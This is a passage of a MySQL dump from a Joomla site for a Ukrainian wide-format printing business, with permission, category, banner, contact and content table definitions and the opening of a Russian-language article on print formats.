per','{}'),(27,8,20,85,2,'com_content.category.2','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(28,3,4,5,2,'com_banners.category.3','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(29,7,14,15,2,'com_contact.category.4','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(30,19,116,117,2,'com_newsfeeds.category.5','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(31,25,132,133,2,'com_weblinks.category.6','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(32,24,128,129,1,'com_users.notes.category.7','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(33,1,137,138,1,'com_finder','com_finder','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(34,1,139,140,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(35,27,21,22,3,'com_content.article.1','Оборудование','{}'),(36,27,23,24,3,'com_content.article.2','Прайс','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(37,27,25,26,3,'com_content.article.3','Контакты','{}'),(38,27,27,28,3,'com_content.article.4','Главная','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(39,27,29,30,3,'com_content.article.5','Услуги','{}'),(40,27,31,32,3,'com_content.article.6','Печать на холсте','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(41,27,33,34,3,'com_content.article.7','Печать на виниле','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(42,27,35,36,3,'com_content.article.8','Баннер печать','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(43,27,37,38,3,'com_content.article.9','Печать на сетке','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(44,27,39,40,3,'com_content.article.10','Печать больших фотографий','{}'),(45,27,41,42,3,'com_content.article.11','Изготовление наружной рекламы','{}'),(46,27,43,44,3,'com_content.article.12','Цифровая печать','{}'),(47,27,45,46,3,'com_content.article.13','Печать фотообоев','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(48,27,47,48,3,'com_content.article.14','Печать флагов','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(49,27,49,50,3,'com_content.article.15','Печать сити-лайтов','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(51,27,51,52,3,'com_content.article.17','Печать на тенте','{}'),(52,27,53,54,3,'com_content.article.18','Печать билбордов','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(53,27,55,56,3,'com_content.article.19','Доставка','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(54,27,57,58,3,'com_content.article.20','Широформатная печать в Днепре — ЭкваторПринт','{}'),(55,27,59,60,3,'com_content.article.21','Широформатная печать в Одессе — ЭкваторПринт','{}'),(56,27,61,62,3,'com_content.article.22','Широкоформатная печать в Киеве — ЭкваторПринт','{}'),(57,27,63,64,3,'com_content.article.23','Широформатная печать в Запорожье — ЭкваторПринт','{}'),(59,27,65,66,3,'com_content.article.25','Широкоформатная печать в Харькове — ЭкваторПринт','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(60,27,67,68,3,'com_content.article.26','Требования к макету','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(61,27,69,70,3,'com_content.article.27','Видео','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(62,7,16,17,2,'com_contact.category.1','Администрация',''),(63,1,141,142,1,'com_tags','com_tags','{}'),(64,1,143,144,1,'com_contenthistory','com_contenthistory','{}'),(65,1,145,146,1,'com_ajax','com_ajax','{}'),(66,1,147,148,1,'com_postinstall','com_postinstall','{}'),(69,1,149,150,1,'com_phocagallery','com_phocagallery','{\"core.admin\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(72,1,151,152,1,'com_xmap','com_xmap','{}'),(73,1,153,154,1,'com_admintools','Admintools','{}'),(74,1,155,156,1,'com_akeeba','Akeeba','{}'),(75,1,157,158,1,'com_securitycheck','Securitycheck','{}'),(76,1,159,160,1,'com_fst','COM_FST','{}'),(77,18,108,109,2,'com_modules.module.94','Freestyle Testimonials: Testimonials','{}'),(78,1,161,162,1,'com_jce','JCE','{}'),(80,27,71,72,3,'com_content.article.29','Модульные картины Харьков','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(81,18,110,111,2,'com_modules.module.95','Карта проезда ЭКВАТОРпринт','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(82,27,73,74,3,'com_content.article.30','Плоттерная порезка пленки','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(83,27,75,76,3,'com_content.article.31','Каталог модульных картин','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(92,27,77,78,3,'com_content.article.40','експеримент','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(93,18,112,113,2,'com_modules.module.92','Телефоны','{}'),(94,27,79,80,3,'com_content.article.41','Работа','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(95,27,81,82,3,'com_content.article.42','Как подтвердить оплату за заказ','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(96,1,163,164,1,'com_fields','com_fields','{}'),(97,1,165,166,1,'com_associations','com_associations','{}'),(98,1,167,168,1,'com_privacy','com_privacy','{}'),(99,1,169,170,1,'com_actionlogs','com_actionlogs','{}'),(100,1,171,172,1,'com_jch_optimize','JCH Optimize','{}'),(101,27,83,84,3,'com_content.article.43','Онлайн фоторедактор ','{}'),(102,11,92,93,2,'com_languages.language.2','Ukrainian (uk-UA)','{}');
/*!40000 ALTER TABLE `j25_assets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_associations`
--

DROP TABLE IF EXISTS `j25_associations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_associations` (
  `id` int(11) NOT NULL COMMENT 'A reference to the associated item.',
  `context` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The context of the associated item.',
  `key` char(32) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.',
  PRIMARY KEY (`context`,`id`),
  KEY `idx_key` (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_associations`
--

LOCK TABLES `j25_associations` WRITE;
/*!40000 ALTER TABLE `j25_associations` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_associations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_banner_clients`
--

DROP TABLE IF EXISTS `j25_banner_clients`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_banner_clients` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `contact` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extrainfo` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint(4) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_banner_clients`
--

LOCK TABLES `j25_banner_clients` WRITE;
/*!40000 ALTER TABLE `j25_banner_clients` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_banner_clients` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_banner_tracks`
--

DROP TABLE IF EXISTS `j25_banner_tracks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_banner_tracks` (
  `track_date` datetime NOT NULL,
  `track_type` int(10) unsigned NOT NULL,
  `banner_id` int(10) unsigned NOT NULL,
  `count` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`track_date`,`track_type`,`banner_id`),
  KEY `idx_track_date` (`track_date`),
  KEY `idx_track_type` (`track_type`),
  KEY `idx_banner_id` (`banner_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_banner_tracks`
--

LOCK TABLES `j25_banner_tracks` WRITE;
/*!40000 ALTER TABLE `j25_banner_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_banner_tracks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_banners`
--

DROP TABLE IF EXISTS `j25_banners`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_banners` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `cid` int(11) NOT NULL DEFAULT '0',
  `type` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `imptotal` int(11) NOT NULL DEFAULT '0',
  `impmade` int(11) NOT NULL DEFAULT '0',
  `clicks` int(11) NOT NULL DEFAULT '0',
  `clickurl` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `custombannercode` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `own_prefix` tinyint(1) NOT NULL DEFAULT '0',
  `metakey_prefix` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `purchase_type` tinyint(4) NOT NULL DEFAULT '-1',
  `track_clicks` tinyint(4) NOT NULL DEFAULT '-1',
  `track_impressions` tinyint(4) NOT NULL DEFAULT '-1',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `idx_state` (`state`),
  KEY `idx_own_prefix` (`own_prefix`),
  KEY `idx_banner_catid` (`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_banners`
--

LOCK TABLES `j25_banners` WRITE;
/*!40000 ALTER TABLE `j25_banners` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_banners` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_categories`
--

DROP TABLE IF EXISTS `j25_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) unsigned NOT NULL DEFAULT '0',
  `path` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `extension` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` mediumtext COLLATE utf8mb4_unicode_ci,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci,
  `metadesc` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`extension`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_path` (`path`(100)),
  KEY `idx_alias` (`alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_categories`
--

LOCK TABLES `j25_categories` WRITE;
/*!40000 ALTER TABLE `j25_categories` DISABLE KEYS */;
INSERT INTO `j25_categories` VALUES (1,62,0,0,13,0,'','com_contact','Администрация','2010-11-06-16-49-07','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2009-10-18 16:07:09',0,'2015-11-20 08:29:40',0,'*',1),(8,27,1,1,2,1,'uncategorised','com_content','Uncategorised','uncategorised','','',1,62,'2022-09-14 17:37:55',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:26:37',0,'0000-00-00 00:00:00',0,'*',1),(9,28,1,3,4,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:35',0,'0000-00-00 00:00:00',0,'*',1),(10,29,1,5,6,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:27:57',0,'0000-00-00 00:00:00',0,'*',1),(11,30,1,7,8,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:15',0,'0000-00-00 00:00:00',0,'*',1),(12,31,1,9,10,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*',1),(13,32,1,11,12,1,'uncategorised','com_users','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',42,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*',1);
/*!40000 ALTER TABLE `j25_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_contact_details`
--

DROP TABLE IF EXISTS `j25_contact_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_contact_details` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `con_position` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `address` mediumtext COLLATE utf8mb4_unicode_ci,
  `suburb` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `state` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `country` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `postcode` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `telephone` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `fax` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `misc` longtext COLLATE utf8mb4_unicode_ci,
  `image` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `email_to` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `mobile` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `webpage` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname3` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language` varchar(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_contact_details`
--

LOCK TABLES `j25_contact_details` WRITE;
/*!40000 ALTER TABLE `j25_contact_details` DISABLE KEYS */;
INSERT INTO `j25_contact_details` VALUES (1,'Администрация','2010-11-06-16-49-40','','','','','','','','','','','',0,1,0,'0000-00-00 00:00:00',1,'{\"show_name\":0,\"show_position\":0,\"show_email\":0,\"show_street_address\":0,\"show_suburb\":0,\"show_state\":0,\"show_postcode\":0,\"show_country\":0,\"show_telephone\":0,\"show_mobile\":0,\"show_fax\":0,\"show_webpage\":0,\"show_misc\":0,\"show_image\":0,\"allow_vcard\":0,\"contact_icons\":0,\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_email_form\":1,\"email_description\":\"\",\"show_email_copy\":1,\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\"}',62,1,1,'','','','','','','0000-00-00 00:00:00',0,'','0000-00-00 00:00:00',0,'','','',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,14606);
/*!40000 ALTER TABLE `j25_contact_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_content`
--

DROP TABLE IF EXISTS `j25_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_content` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `introtext` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `fulltext` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribs` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The language code for the article.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`),
  KEY `idx_alias` (`alias`(191))
) ENGINE=InnoDB AUTO_INCREMENT=44 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_content`
--

LOCK TABLES `j25_content` WRITE;
/*!40000 ALTER TABLE `j25_content` DISABLE KEYS */;
INSERT INTO `j25_content` VALUES (1,35,'Оборудование','2010-11-06-15-56-21','<p>&nbsp;</p>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"text-align: center;\">Формат широкоформатной печати</h3>\r\n<p style=\"text-align: justify;\">Из самой формулировки \"широкоформатная печать\", становится понятно, что это печать на материале широкого формата, намного отличающегося от обычных пользовательских размеров.</p>\r\n<h5><strong>Что же такое формат печати?</strong></h5>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/format.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Формат печати определяется двумя параметрами: шириной и высотой листа. Как правило ширина и высота зависят друг от друга в определенной пропорции. К примеру, формат печати \"А\" это пропорция высоты к ширине равная 1,41. Таким образом, у каждого формата печати есть свой стандартизированный международный индекс обозначения.</p>\r\n<p style=\"text-align: justify;\"><strong>Широкоформатная печать и формат печати – не связанные понятия</strong><br /> <br /> Широкоформатная печать также определяется параметрами \"ширина\" материала для печати и длиной рулона, но, в отличие от формата печати, здесь не выдерживаются стандартизированные пропорции касающиеся соотношения \"высота\". <br /> <br /> Назвать широкоформатную печать исключительно \"форматной\" нельзя, так как готовое изделие может иметь как стандартный формат так и абсолютно \"неформатный\" размер. Что вполне логично, ведь рекламы, вывески, плакаты, согласно разнообразности дизайнерских решений, имеют абсолютно разные пропорции</p>\r\n<h5 style=\"text-align: justify;\"><strong>Размеры материалов для широкоформатной печати</strong></h5>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/razmer.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" style=\"float: left; margin-left: 5px; margin-right: 5px;\" />Хотя строгих стандартов для широкоформатной печати нет, все же есть определенные размеры печатных материалов, которые наиболее удобны для печати. Таким образом подобранные размеры рулонов, позволяют максимально продуктивно использовать всю площадь запечатываемого материала.<br /> <br /> Список основных материалов для широкоформатной печати со стандартными размерами рулонов:</p>\r\n<p 